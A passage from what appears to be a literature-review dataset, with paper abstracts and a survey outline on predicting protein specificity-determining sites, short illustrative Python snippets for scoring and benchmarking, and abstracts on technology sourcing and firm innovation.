For example, we found that for smaller distances it holds true that the more reliable the prediction method is, the closer predicted specificity determining sites are to each other and to the ligand. Conclusion: We observed certain similarities of structural features between predicted and actual subsites which might point to their functional relevance. We speculate that the majority of the identified potential specificity determining sites might be indirectly involved in specific interactions and could be ideal targets for mutagenesis experiments. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular functional specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolutionary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at Bioinformatics online.
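A recurring idea in the SPEER and GroupSim entries above is that a specificity determining site is conserved within each subfamily but divergent between subfamilies. The sketch below is a deliberately simplified, generic illustration of that intuition, scoring each column by a symmetric Kullback-Leibler style divergence between the amino-acid distributions of two subfamilies; it is not the published SPEER or GroupSim scoring function, and the pseudocount, helper names and toy sequences are assumptions.

```python
import math
from collections import Counter

AMINO_ACIDS = "ACDEFGHIKLMNPQRSTVWY"

def column_distribution(column, pseudocount=0.5):
    """Smoothed amino-acid frequency distribution for one subfamily column."""
    counts = Counter(aa for aa in column.upper() if aa in AMINO_ACIDS)
    total = sum(counts.values()) + pseudocount * len(AMINO_ACIDS)
    return {aa: (counts[aa] + pseudocount) / total for aa in AMINO_ACIDS}

def divergence_score(col_a, col_b):
    """Symmetric KL-style divergence between two subfamilies at one position.

    Higher values suggest subfamily-specific conservation (a candidate SDS).
    """
    p, q = column_distribution(col_a), column_distribution(col_b)
    return sum(p[aa] * math.log2(p[aa] / q[aa]) +
               q[aa] * math.log2(q[aa] / p[aa]) for aa in AMINO_ACIDS)

def rank_positions(subfamily_a, subfamily_b):
    """Rank alignment positions by divergence between two aligned subfamilies."""
    cols_a = ["".join(c) for c in zip(*subfamily_a)]
    cols_b = ["".join(c) for c in zip(*subfamily_b)]
    scores = [divergence_score(a, b) for a, b in zip(cols_a, cols_b)]
    return sorted(enumerate(scores, start=1), key=lambda x: x[1], reverse=True)

if __name__ == "__main__":
    sub_a = ["MKDLAT", "MKDLAS", "MKDLAT"]   # invented subfamily A
    sub_b = ["MKRLAT", "MKRLGT", "MKRLAT"]   # invented subfamily B (differs at position 3)
    for pos, score in rank_positions(sub_a, sub_b)[:3]:
        print(f"position {pos}: divergence = {score:.2f}")
```

The published methods add further ingredients on top of this core signal, for example physico-chemical property encoding, evolutionary rates or windowed conservation of neighbouring residues.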
--- paper_title: Sequence analysis Multi-RELIEF: a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at Bioinformatics online ---
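The multi-RELIEF entry above builds on RELIEF feature weighting: a position gains weight when it agrees with the nearest sequence of the same functional class and disagrees with the nearest sequence of another class. The following sketch shows a bare-bones two-class RELIEF pass over alignment columns; it omits the multi-class splitting and 3D-structure weighting of the published method, and all identifiers and toy data are assumptions made for the example.

```python
def hamming(a, b):
    """Simple distance between two aligned sequences (mismatch count)."""
    return sum(x != y for x, y in zip(a, b))

def relief_weights(sequences, labels, epochs=1):
    """One-nearest-hit / one-nearest-miss RELIEF weights per alignment column.

    High-weight columns separate the two functional classes and are
    candidate specificity-determining positions.
    """
    n_pos = len(sequences[0])
    weights = [0.0] * n_pos
    for _ in range(epochs):
        for i, (seq, lab) in enumerate(zip(sequences, labels)):
            same = [s for j, (s, l) in enumerate(zip(sequences, labels))
                    if l == lab and j != i]
            other = [s for s, l in zip(sequences, labels) if l != lab]
            if not same or not other:
                continue
            hit = min(same, key=lambda s: hamming(seq, s))
            miss = min(other, key=lambda s: hamming(seq, s))
            for p in range(n_pos):
                # reward columns that differ from the nearest miss,
                # penalize columns that differ from the nearest hit
                weights[p] += (seq[p] != miss[p]) - (seq[p] != hit[p])
    m = len(sequences) * epochs
    return [w / m for w in weights]

if __name__ == "__main__":
    seqs = ["MKDLAT", "MKDLAS", "MKRLGT", "MKRLGT"]   # invented toy alignment
    labs = ["A", "A", "B", "B"]                        # two functional subfamilies
    for pos, w in enumerate(relief_weights(seqs, labs), start=1):
        print(f"position {pos}: weight = {w:+.2f}")
```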
Title: A survey on prediction of specificity-determining sites in proteins
Section 1: INTRODUCTION
Description 1: Introduce the field and context of specificity-determining sites (SDS) in proteins, the evolutionary theories behind them, and the various challenges in identifying these sites computationally.
Section 2: STATUS OF THE FIELD: Existing algorithms for SDS prediction
Description 2: Discuss the status and development of various computational approaches used for SDS prediction, including early approaches, entropy-based methods, evolutionary rate-based methods, automated subgrouping, 3D structure-based methods, machine learning techniques, and ensemble approaches.
Section 3: Performance of SDS-predicting algorithms
Description 3: Assess the performance of different SDS prediction algorithms using various metrics like sensitivity, accuracy, F score, MCC, and area under the curve (AUC).
Section 4: Effective benchmarking of SDS prediction algorithms
Description 4: Present an exhaustive and objective benchmarking analysis of the existing SDS prediction methods using multiple data sets of various sizes and biological functions.
Section 5: Overall performance of SDS prediction programs
Description 5: Analyze the overall performance of the reviewed SDS prediction programs, focusing on their strengths and weaknesses in predicting different types of SDS and their efficiency in various conservation spectra.
Section 6: Comparison of performance based on biological functions
Description 6: Compare the performance of SDS prediction programs across different biological functions and data sets, including enzyme classes and non-enzyme classes.
Section 7: Influence of subfamily number
Description 7: Examine how the number of subfamilies in a protein sequence alignment affects the variability and complexity of identifying SDS, and the performance of prediction algorithms in such scenarios.
Section 8: CONCLUSION
Description 8: Summarize the findings from the review, detailing the progress made in the field, the best performing approaches, and the future directions for both computational and experimental efforts in SDS prediction.
Section 9: SUPPLEMENTARY DATA
Description 9: Mention the availability of supplementary data online for extended analysis and additional details pertaining to the reviewed prediction methods and benchmarking studies.
Section 10: Key Points
Description 10: Highlight key points from the review, summarizing critical aspects and the importance of predicting specificity-determining sites in proteins.
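Sections 3-5 of the outline above compare SDS predictors using sensitivity, accuracy, F score, MCC and the area under the ROC curve. As a hedged illustration of how such a benchmark can be scored from per-position prediction scores and a set of annotated specificity determining sites (not the evaluation code of any cited study), a minimal Python sketch follows; the threshold and toy data are assumptions.

```python
import math

def confusion(scores, true_sites, threshold):
    """Confusion counts for per-position scores against known SDS positions."""
    tp = fp = tn = fn = 0
    for pos, s in scores.items():
        predicted, actual = s >= threshold, pos in true_sites
        if predicted and actual:
            tp += 1
        elif predicted:
            fp += 1
        elif actual:
            fn += 1
        else:
            tn += 1
    return tp, fp, tn, fn

def benchmark(scores, true_sites, threshold=0.5):
    """Sensitivity, precision, MCC and AUC for one predictor on one family."""
    tp, fp, tn, fn = confusion(scores, true_sites, threshold)
    sens = tp / (tp + fn) if tp + fn else 0.0
    prec = tp / (tp + fp) if tp + fp else 0.0
    denom = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    mcc = (tp * tn - fp * fn) / denom if denom else 0.0
    # AUC via the rank-sum (Mann-Whitney) formulation
    pos = [s for p, s in scores.items() if p in true_sites]
    neg = [s for p, s in scores.items() if p not in true_sites]
    pairs = [(1.0 if a > b else 0.5 if a == b else 0.0) for a in pos for b in neg]
    auc = sum(pairs) / len(pairs) if pairs else 0.0
    return {"sensitivity": sens, "precision": prec, "MCC": mcc, "AUC": auc}

if __name__ == "__main__":
    toy_scores = {1: 0.9, 2: 0.2, 3: 0.8, 4: 0.4, 5: 0.1}   # invented predictor output
    known_sds = {1, 3}                                        # invented annotated SDS
    print(benchmark(toy_scores, known_sds))
```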
The impact of internal and external technology sourcing on innovation performance: a review and research agenda
10
--- paper_title: External Technology Sourcing Through Alliances or Acquisitions: An Analysis of the Application-Specific Integrated Circuits Industry paper_content: In today's turbulent business environment innovation is the result of the interplay between two distinct but related factors: endogenous R&D efforts and (quasi) external acquisition of technology and know-how. Given the increasing importance of innovation, it is vital to understand more about the alternative mechanisms--such as alliances and acquisitions--that can be used to enhance the innovative performance of companies. Most of the literature has dealt with these alternatives as isolated issues. Companies, however, are constantly challenged to choose between acquisitions and strategic alliances, given the limited resources that can be spent on research and development. This paper contributes to the literature because it focuses on the choice between innovation-related alliances and acquisitions. We focus on the question of how the trade-off between strategic alliances and acquisitions is influenced by previous direct and indirect ties between firms in an industry network of interfirm alliances. We formulate hypotheses pertaining to the number of direct ties between two companies, their proximity in the overall alliance network, and their centrality in that network. In so doing, we distinguish between ties that connect firms from the same and from different industry segments, and those that connect firms from the same or from different world regions. These hypotheses are tested on a sample of strategic alliances and acquisitions in the application-specific integrated circuits (ASIC) industry. The findings show that a series of strategic alliances between two partners increases the probability that one will ultimately acquire the other. Whereas previous direct contacts tend to lead to an acquisition, this is not true of previous indirect contacts, which increase the probability that a link between the companies, once it is forged, takes the form of a strategic alliance. In the case of acquisitions, firms that are more centrally located in the network of interfirm alliances tend to be acquirers, and firms with a less central position tend to become acquired. These findings underscore the importance of taking previously formed interfirm linkages into account when explaining the choice between strategic alliances and acquisitions, as these existing links influence the transaction costs associated with both alternatives. --- paper_title: External technology sourcing and innovation performance in LMT sectors: An analysis based on the Taiwanese Technological Innovation Survey paper_content: This paper presents the strategies that low- and medium-technology (LMT) firms adopt to generate technological innovation and investigates the impact of these approaches on the firms' innovation performances. These analyses are based on a sample from the Taiwanese Technological Innovation Survey totalling 753 LMT firms. The descriptive statistics show that about 95% of the firms acquired technology by technology licensing, while 32% of the firms engaged in R&D outsourcing. The firms in the sample acquiring external technological knowledge through collaboration with suppliers, clients, competitors, and research organizations are about 20%, 18%, 8%, and 23%, respectively. Using a moderated hierarchical regression analysis, this study reveals interesting results. 
First, inward technology licensing does not contribute significantly to innovation performance. Second, internal R&D investment negatively moderates the effect of R&D outsourcing on innovation performance. Third, internal R&D investment contingently impacts the different types of partners on innovation performance: by collaborating with different types of partners, firms with more internal R&D investment gain higher innovation returns than firms with fewer internal R&D activities. The results of this study contribute to a sharper understanding of technological innovation strategies and their effects on technological innovation performance in LMT sectors. --- paper_title: Collaboration and innovation: a review of the effects of mergers, acquisitions and alliances on innovation paper_content: Over the past decades, a strong upheaval in the use of alternative forms of organization gave way to increased attention in the academic literature to the performance effects of, in particular, strategic alliances and mergers and acquisitions (M&A). Whereas mergers and acquisitions and strategic alliances are primarily known for their ability to facilitate entry into new markets and their effectiveness in achieving scale and scope economies we would like to focus on their effects on the innovative performance of companies involved. In spite of the vast and rapidly growing body of literature on the use and structure of strategic alliances and mergers and acquisitions, there are hardly any studies that address the question of whether one mode of partnering is superior to the other in terms of strengthening the innovative capabilities of the partners involved. Moreover, no extensive review of the empirical literature on this specific research topic is available. Given the growing importance of innovation for the competitive position of companies (Porter, 1990) and the fact that innovation is shown to be one of the driving forces of 20th century growth (Franko, 1989) it is of eminent importance that we study the effect of alternative governance mechanisms on the innovative performance of companies (Vanhaverbeke et al., 2002). Since, no general conclusions have been drawn based on the existing literature, knowledge accumulation is inhibited. It is unclear which research questions have already been answered and which are still open for further exploration. The lack of a coherent overview also implies that practitioners have no empirically validated guidelines when preparing for the best mode of organizing for innovation. Should managers opt for M&A or an alliance if they intend to increase innovation? What specific circumstances affect this choice? What type of alliance is best suited to a particular situation? The absence of an exhausting overview of empirical findings so far, makes it impossible to even begin answering these questions. Hence, there is a necessity for a review of empirical studies on the effect of M&A versus alliances on innovation. --- paper_title: AN EVOLUTIONARY PERSPECTIVE ON DIVERSIFICATION AND CORPORATE RESTRUCTURING: ENTRY, EXIT, AND ECONOMIC PERFORMANCE DURING 1981-89 paper_content: This study proposes a theoretical perspective that firms engage in continuous search and selection activities in order to improve their knowledge base and thereby improve their performance. This general framework is applied to the context of corporate evolution. Entry and exit activities are understood as search and selection undertaken by the firm to improve their performance. 
One of the compelling features of this framework is that firms learn from their past entry experience and approach the next entry in a more focused and directed manner over time. Also, firms acquire additional knowledge from each entry event while applying their existing knowledge base. With a longitudinal (1981-89) data base on entry and exit activities of all publicly traded manufacturing firms in the United States, this study shows that applicability of the firm's knowledge base plays an important role in predicting which businesses a firm enters or exits. Firms sequentially enter businesses of similar human resource profiles and firms are more likely to divest lines of business of different profiles. Corporate-level analysis shows that such well-directed entry and exit contribute to the improvement of a firm's profitability. --- paper_title: The Effect of Governance Modes and Relatedness of External Business Development Activities on Innovative Performance paper_content: This study examines how different governance modes for external business development activities and venture relatedness affect a firm's innovative performance. Building on research suggesting that interorganizational relationships enhance the innovative performance of firms, we propose that governance modes and venture relatedness interact in their effect on innovative performance. Analyzing a panel of the largest firms in four information and communication technology sectors, we find that degree of relatedness for corporate venture capital investments, alliances, joint ventures, and acquisitions influences their impact on innovative performance. Copyright © 2008 John Wiley & Sons, Ltd. --- paper_title: Network location and learning: the influence of network resources and firm capabilities on alliance formation paper_content: This paper presents a dynamic, firm-level study of the role of network resources in determining alliance formation. Such resources inhere not so much within the firm but reside in the interfirm networks in which firms are placed. Data from extensive fieldwork show that by influencing the extent to which firms have access to information about potential partners, such resources are an important catalyst for new alliances, especially because alliances entail considerable hazards. This study also assesses the importance of firms' capabilities with alliance formation and material resources as determinants of their alliance decisions. I test this dynamic framework and its hypotheses about the role of time-varying network resources and firm capabilities with comprehensive longitudinal multi-industry data on the formation of strategic alliances by a panel of firms between 1970 and 1989. The results confirm field observations that accumulated network resources arising from firm participation in the network of accumulated prior alliances are influential in firms' decisions to enter into new alliances. This study highlights the importance of network resources that firms derive from their embeddedness in networks for explaining their strategic behavior. Copyright © 1999 John Wiley & Sons, Ltd. --- paper_title: Managing Mergers Across Borders: a Two-Nation Exploration of a Nationally Bound Administrative Heritage paper_content: Top managers of British and French firms, which were recently acquired by either British or French firms, were surveyed as to their perceptions of the administrative approach, reflected in integrating mechanisms, used by the acquiring firms to establish headquarters-subsidiary control.
Four types of integrative mechanisms were examined: structural, systems, social, and managerial. A multiple analysis of covariance model, coupled with a two-nation (British and French), two-merger type (domestic, cross-national) sampling design, found evidence that the administrative approaches used by managers during merger integration from two nations partially reflect their different heritages, and that these differences are consistent with national differences and the theoretical perspectives of institutional development and cross-cultural studies. Our findings, while exploratory, provide insight into the administrative difficulties of managing across borders and help us understand why many cross-national firms continue to use ethnocentric approaches in spite of the incentives for adopting a transnational approach. Moreover, our findings add one more voice to a growing chorus calling for a theory of the firm, as embedded, institutionally, culturally, and historically. --- paper_title: Overcoming Local Search Through Alliances and Mobility paper_content: Recent research suggests that, due to organizational and relational constraints, firms are limited contextually--both geographically and technologically--in their search for new knowledge. But distant contexts may offer ideas and insights that can be extremely useful to innovation through knowledge recombination. So how can firms reach beyond their existing contexts in their search for new knowledge? In this paper, we suggest that two mechanisms--alliances and the mobility of inventors--can serve as bridges to distant contexts and, thus, enable firms to overcome the constraints of contextually localized search.Through the analysis of patent citation patterns in the semiconductor industry, we first demonstrate both the geographic and technological localization of knowledge. We then explore if the formation of alliances and mobility of active inventors facilitate interfirm knowledge flows across contexts. We find that mobility is associated with interfirm knowledge flows regardless of geographic proximity and, in fact, the usefulness of alliances and mobility increases with technological distance. These findings suggest that firms can employ knowledge acquisition mechanisms to fill in the holes of their existing technological and geographic context. --- paper_title: Multinational Corporations and European Regional Systems of Innovation paper_content: In globalising economies, particularly those going through a process of economic integration such as those economies within the EU, regions forge an increasing number of linkages with other locations within and across national borders. This is largely carried out by the technological efforts of Multinational Corporations (MNCs). This book explores the regional dimension of Europe in terms of localised technological comparative advantages and the location of innovative activities by MNCs. Using an empirical analysis John Cantwell and Simona Iammarino cover such important themes as: *MNC technological activities and economic wealth *MNCs and the regional systems of innovation in Italy, UK, Germany and France *the geographical hierarchy across European national borders. --- paper_title: Towards understanding who makes corporate venture capital investments and why paper_content: This study examines when established firms participate in corporate venture capital (CVC). We build on the resource-based view of interfirm collaboration and emphasize the strategic flexibility of CVC relationships. 
We use longitudinal data on 477 firms from 1990 to 2000 to test our hypotheses. We find that firms in industries with rapid technological change, high competitive intensity and weak appropriability engage in greater CVC activity. We also show that firms that possess strong technological and marketing resources and resources developed from diverse venturing experience engage in greater CVC activity. Finally, we find that these firm resources moderate the influence of the observed industry effects in paradoxical ways. --- paper_title: Evolutionary trajectories in petroleum firm R&D paper_content: Tacit knowledge and cumulative learning underlie an evolutionary theory of business firm development and strategy. As one test case of the theory, this study examines firms' applied research and development activities. Evolutionary theory suggests that firms within an industry will tend both to persist and to differ in the amount of effort they devote to various R&D applications. A test of the hypothesis of persistent differences in R&D, using uniquely detailed data from the petroleum industry, provides support for evolutionary theory. --- paper_title: Something Old, Something New: A Longitudinal Study of Search Behavior and New Product Introduction paper_content: We examine how firms search, or solve problems, to create new products. According to organizational learning research, firms position themselves in a unidimensional search space that spans a spectrum from local to distant search. Our findings in the global robotics industry suggest that firms' search efforts actually vary across two distinct dimensions: search depth, or how frequently the firm reuses its existing knowledge, and search scope, or how widely the firm explores new knowledge. --- paper_title: Innovation Management Measurement: A Review paper_content: Measurement of the process of innovation is critical for both practitioners and academics, yet the literature is characterized by a diversity of approaches, prescriptions and practices that can be confusing and contradictory. Conceptualized as a process, innovation measurement lends itself to disaggregation into a series of separate studies. The consequence of this is the absence of a holistic framework covering the range of activities required to turn ideas into useful and marketable products. We attempt to address this gap by reviewing the literature pertaining to the measurement of innovation management at the level of the firm. Drawing on a wide body of literature, we first develop a synthesized framework of the innovation management process consisting of seven categories: inputs management, knowledge management, innovation strategy, organizational culture and structure, portfolio management, project management and commercialization. Second, we populate each category of the framework with factors empirically demonstrated to be significant in the innovation process, and illustrative measures to map the territory of innovation management measurement. The review makes two important contributions. First, it takes the difficult step of incorporating a vastly diverse literature into a single framework. Second, it provides a framework against which managers can evaluate their own innovation activity, explore the extent to which their organization is nominally innovative or whether or not innovation is embedded throughout their organization, and identify areas for improvement.
--- paper_title: Towards a Methodology for Developing Evidence-Informed Management Knowledge by Means of Systematic Review paper_content: Undertaking a review of the literature is an important part of any research project. The researcher both maps and assesses the relevant intellectual territory in order to specify a research question which will further develop the knowledge base. However, traditional 'narrative' reviews frequently lack thoroughness, and in many cases are not undertaken as genuine pieces of investigatory science. Consequently they can lack a means for making sense of what the collection of studies is saying. These reviews can be biased by the researcher and often lack rigour. Furthermore, the use of reviews of the available evidence to provide insights and guidance for intervention into operational needs of practitioners and policymakers has largely been of secondary importance. For practitioners, making sense of a mass of often-contradictory evidence has become progressively harder. The quality of evidence underpinning decision-making and action has been questioned, for inadequate or incomplete evidence seriously impedes policy formulation and implementation. In exploring ways in which evidence-informed management reviews might be achieved, the authors evaluate the process of systematic review used in the medical sciences. Over the last fifteen years, medical science has attempted to improve the review process by synthesizing research in a systematic, transparent, and reproducible manner with the twin aims of enhancing the knowledge base and informing policymaking and practice. This paper evaluates the extent to which the process of systematic review can be applied to the management field in order to produce a reliable knowledge stock and enhanced practice by developing context-sensitive research. The paper highlights the challenges in developing an appropriate methodology. --- paper_title: The Effects of Personal and Contextual Characteristics on Creativity: Where Should We Go from Here? paper_content: This article systematically reviews and integrates empirical research that has examined the personal and contextual characteristics that enhance or stifle employee creativity in the workplace. Based on our review, we discuss possible determinants of employee creativity that have received little research attention, describe several areas where substantial challenges and unanswered questions remain, present a number of new research directions for theory building, and identify methodological improvements needed in future studies of creativity in organizations. --- paper_title: A Multi-Dimensional Framework of Organizational Innovation: A Systematic Review of the Literature paper_content: This paper consolidates the state of academic research on innovation. Based on a systematic review of literature published over the past 27 years, we synthesize various research perspectives into a comprehensive multi-dimensional framework of organizational innovation – linking leadership, innovation as a process, and innovation as an outcome. We also suggest measures of determinants of organizational innovation and present implications for both research and managerial practice. --- paper_title: PERSPECTIVE: Ranking the Technology Innovation Management Journals paper_content: A citation analysis of the 10 leading technology and innovation management (TIM) specialty journals is conducted to gain insights into the relative ranking of the journals.
The journals are ranked based on number of citations, citations adjusted for publication frequency, citations corrected for age, citations corrected for self-citation, and an overall score. The top 50 journals in management of technology based on citation analysis are listed. Overall, the top journals based on citation analysis include Journal of Product Innovation Management, Research Policy, Research-Technology Management, Harvard Business Review, Strategic Management Journal, Management Science, Administrative Science Quarterly, and R&D Management. How the journals relate to each other and the related implications of these findings are considered. --- paper_title: Leveraging External Sources of Innovation: A Review of Research on Open Innovation paper_content: This article reviews research on open innovation that considers how and why firms commercialize external sources of innovations. It examines both the “outside-in” and “coupled” modes of Enkel et al. (2009). From an analysis of prior research on how firms leverage external sources of innovation, it suggests a four-phase model in which a linear process — (1) obtaining, (2) integrating and (3) commercializing external innovations — is combined with (4) interaction between the firm and its collaborators. This model is used to classify papers taken from the top 25 innovation journals identified by Linton and Thongpapan (2004), complemented by highly cited work beyond those journals. A review of 291 open innovation-related publications from these sources shows that the majority of these articles indeed address elements of this inbound open innovation process model. Specifically, it finds that researchers have front-loaded their examination of the leveraging process, with an emphasis on obtaining innovations from external sources. However, there is a relative dearth of research related to integrating and commercializing these innovations. Research on obtaining innovations includes searching, enabling, filtering, and acquiring — each category with its own specific set of mechanisms and conditions. Integrating innovations has been mostly studied from an absorptive capacity perspective, with less attention given to the impact of competencies and culture (including not-invented-here). Commercializing innovations puts the most emphasis on how external innovations create value rather than how firms capture value from those innovations. Finally, the interaction phase considers both feedback for the linear process and reciprocal innovation processes such as co-creation, network collaboration and community innovation. This review and synthesis suggests several gaps in prior research. One is a tendency to ignore the importance of business models, despite their central role in distinguishing open innovation from earlier research on inter-organizational collaboration in innovation. Another gap is a tendency in open innovation to use “innovation” in a way inconsistent with earlier definitions in innovation management. The article concludes with recommendations for future research that include examining the end-to-end innovation commercialization process, and studying the moderators and limits of leveraging external sources of innovation. --- paper_title: Innovation in Cities: Science-Based Diversity, Specialization and Localized Competition paper_content: Whether diversity or specialization of economic activity better promotes technological change and subsequent economic growth has been the subject of a heated debate in the economics literature.
The purpose of this paper is to consider the effect of the composition of economic activity on innovation. We test whether the specialization of economic activity within a narrow concentrated set of economic activities is more conducive to knowledge spillovers or if diversity, by bringing together complementary activities, better promotes innovation. The evidence provides considerable support for the diversity thesis but little support for the specialization thesis. --- paper_title: The future of open innovation paper_content: Institutional openness is becoming increasingly popular in practice and academia: open innovation, open R&D and open business models. Our special issue builds on the concepts, underlying assumptions and implications discussed in two previous R&D Management special issues (2006, 2009). This overview indicates nine perspectives needed to develop an open innovation theory more fully. It also assesses some of the recent evidence that has come to light about open innovation, in theory and in practice. --- paper_title: Technological Platforms and Diversification paper_content: As the invention of fundamental new sciences spawns subsequent research, discovery, and commercialization, core technologies branch into new applications and markets. Some of them evolve over time into many derived technologies, whereas others are essentially “dead ends.” The pattern of evolution and branching is called a “technological trajectory.” An intriguing question is whether some firms can ride the trajectory by developing proprietary experience in a “platform technology.” Because the knowledge is proprietary, firms that originate in industrial fields based on a platform technology acquire the technological skills to diversify and to mimic the branching of the underlying technological trajectory. The ability to compete in hypercompetitive markets depends on the acquisition of know-how that is applicable to a wide set of market opportunities. Such capabilities serve as platforms into quickly evolving markets. To respond rapidly to market changes, a firm must have already acquired fundamental competitive knowledge. In a high-technology industry, such knowledge invariably is derived from experience with the underlying science and related technological fields. The authors examine capabilities as platforms by analyzing the temporal sequence of diversification as contingent on market opportunities and previous experience. The pattern of diversification of firms reflects the evolutionary branching of underlying technologies. In that sense, the aggregate decisions of firms are driven by the technological trajectories common across an industrial sector. Certain technologies have wider technological and market opportunities, and consequently experience in those technologies serves as a platform for expansion. The authors propose that a firm's experience in platform technologies increases the likelihood of diversification when environmental opportunities are favorable. The proposition is tested with the sample of 176 semiconductor startup companies founded between 1977 and 1989. Evidence from multidimensional scaling of expert opinion and from an analysis of patent records was gathered to identify relatedness among subfields and the evolutionary direction of the technologies. A discrete hazard model is specified to estimate the effect of technological histories on subsequent diversification.
The results confirm the relationship between relatedness and directionality of technologies and the industrial path of diversification. The finding that diversification depends on technological experience and market opportunity has important implications for firms' entry decisions. The authors discuss those implications by describing experience as generating options on future opportunities and distinguishing between the historical path by which the stock of knowledge is accumulated and the path by which new knowledge is generated and commercialized. --- paper_title: Innovative competence, exploration and exploitation: The influence of technological diversification paper_content: This paper investigates how technological diversification influences the rate and specific types of innovative competence. We test a set of hypotheses in a longitudinal study of a sample of biotechnology firms. Our findings provide strong support for the premise that a diversified technology base positively affects innovative competence. Furthermore, technological diversification is found to have a stronger effect on exploratory than on exploitative innovative capability. This empirical evidence suggests that technological diversity may mitigate core rigidities and path dependencies by enhancing novel solutions that accelerate the rate of invention, especially that which departs from a firm's past activities. --- paper_title: Does Technological Diversification Promote Innovation? An Empirical Analysis for European Firms paper_content: Abstract This paper analyses the impact of technological diversity on innovative activity at the firm level. The empirical study on a panel of European R&D active companies shows that both R&D intensity and patents increase with the degree of technological diversification of the firm. Possible explanations are that, on the one hand, a firm that diversifies its technology can receive more spillovers from other (related) technological fields. On the other hand, diversification can reduce the risk from technological investments and it creates incentives to spend more on R&D. The paper provides empirical evidence relevant to the diversity-specialization innovation debate. --- paper_title: International Diversification: Effects on Innovation and Firm Performance in Product-Diversified Firms paper_content: Theory suggests and results show that firm performance is initially positive but eventually levels off and becomes negative as international diversification increases. Product diversification moderates the relationship between international diversification and performance. International diversification is negatively related to performance in nondiversified firms, positively related in highly product-diversified firms, and curvilinearly related in moderately product-diversified firms. International diversification is also positively related to R&D intensity, but the interaction effects with product diversification are negative. The results of this study provide evidence of the importance of international diversification for competitive advantage but also suggest the complexities of implementing it to achieve these advantages in product-diversified firms. 
--- paper_title: Technological diversity of persistent innovators in Japan: Two case studies of large Japanese firms paper_content: We have investigated two large Japanese firms with their patent data, technological histories and product sales data of over 30 years, especially in terms of intra-firm technology diversification and interactions between multiple technological trajectories. Patent data showed the process of emergence of technological trajectories and interactions (cross-fertilization) between them quantitatively. Both persistence and diversity of technology have contributed to product diversification and sales growth. Based on our findings we have demonstrated that taking advantage of economies of scope in technology through persistence and diversification is necessary for a technology-based firm if it is to survive and to grow for a prolonged period of time. © 2003 Elsevier B.V. All rights reserved. --- paper_title: TOWARDS A THEORY OF THE TECHNOLOGY-BASED FIRM paper_content: Abstract The modern firm is a very viable economic institution, drawing strength from a competitive market economy, with embedded `super-markets' for corporate control and `sub-markets' for internal organization. The technology-based firm in addition draws strength from its co-evolution with modern science and technology (and vice versa), and thereby becomes increasingly important. However, received theories of the firm, of which there are many, have not particularly taken account of technology and technology-based firms, nor their management. This paper takes an empirical point of departure from recent findings regarding the positive relationship between technology diversification on the one hand and corporate growth and business diversification on the other. These findings are not readily explainable by received theories of the firm, which the paper reviews, and the findings are thus taken as an explanandum for a proposed approach to formulate a theory of the technology-based firm. The approach is compatible with various other theoretical approaches such as the resource-based, the transaction-cost and the evolutionary approach, but specifically takes the idiosyncrasies of technology (i.e., technical competence) as well as management into account. Through notably strong economies of scale, scope, speed and space associated with the combination of different technologies and resources, the technology-based firm is subjected to specific dynamics in its growth and diversification and shifts of businesses and resources. In particular, a technology-based firm tends to engage in technology diversification, thereby becoming multitechnological. As such the technology-based firm has incentives to economize on increasingly expensive new technologies by pursuing strategies of internationalization on both input and output markets, technology-related business diversification, external technology marketing and sourcing, R&D rationalization and technology-related partnering. --- paper_title: THE USE OF KNOWLEDGE FOR TECHNOLOGICAL INNOVATION WITHIN DIVERSIFIED FIRMS paper_content: We propose that searching for and transferring knowledge across divisions in a diversified firm can cultivate innovation. Using a sample of 211,636 patents from 1,644 companies during the period 1985–96, we find that the use of interdivisional knowledge positively affects the impact of an invention on subsequent technological developments.
